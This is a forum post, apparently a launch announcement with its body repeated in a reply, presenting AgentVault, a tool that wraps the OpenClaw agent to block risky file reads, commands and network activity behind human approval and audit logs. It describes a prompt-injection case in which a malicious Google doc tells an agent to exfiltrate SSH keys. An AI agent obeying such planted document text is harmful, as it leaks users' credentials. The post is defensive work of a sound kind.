After watching OpenClaw hit 179K GitHub stars while accumulating 5 CVEs, and 341 malicious marketplace skills, and exposing 42K instances in 10 days, I spent 3 hours building AgentVault.
The Issue
The research conducted by Penligent, Zenity, and CrowdStrike reached the conclusion that prompt injection is architecturally unsolvable: you simply cannot prevent a bad prompt from reaching the model. However, the subsequent malicious actions could be stopped by you.
What AgentVault Offers.
- The file system interception is deep which could catch when the agents read ~/.aws/credentials.
- Prevents unsafe commands – blocks the use of ‘rm -rf’ and more.
- Human actions require approvals – all risky actions require your OK.
- Monitors your network activity – logs any outbound connections.
- SQLite database of everything. Comprehensive audit trails.
The method consists of allowing prompt injection to succeed, but catching what it attempts to perform. When Agent Vault identifies a Google doc as malicious that tells the agent to exfiltrate your SSH keys it blocks the file read. It also notifies you.
Developed using Node.js/TypeScript and a Next.js dashboard with SQLite audit log integration. The execution layer of OpenClaw is wrapped with a proxy that hijacks system calls.
This is day 01. What would it take to make this useful for your setup?
hugoventures1•2h ago
The Issue The research conducted by Penligent, Zenity, and CrowdStrike reached the conclusion that prompt injection is architecturally unsolvable: you simply cannot prevent a bad prompt from reaching the model. However, the subsequent malicious actions could be stopped by you.
What AgentVault Offers. - The file system interception is deep which could catch when the agents read ~/.aws/credentials. - Prevents unsafe commands – blocks the use of ‘rm -rf’ and more. - Human actions require approvals – all risky actions require your OK. - Monitors your network activity – logs any outbound connections. - SQLite database of everything. Comprehensive audit trails.
The method consists of allowing prompt injection to succeed, but catching what it attempts to perform. When Agent Vault identifies a Google doc as malicious that tells the agent to exfiltrate your SSH keys it blocks the file read. It also notifies you.
live demo GitHub: https://github.com/hugoventures1-glitch/agentvault.
Developed using Node.js/TypeScript and a Next.js dashboard with SQLite audit log integration. The execution layer of OpenClaw is wrapped with a proxy that hijacks system calls.
This is day 01. What would it take to make this useful for your setup?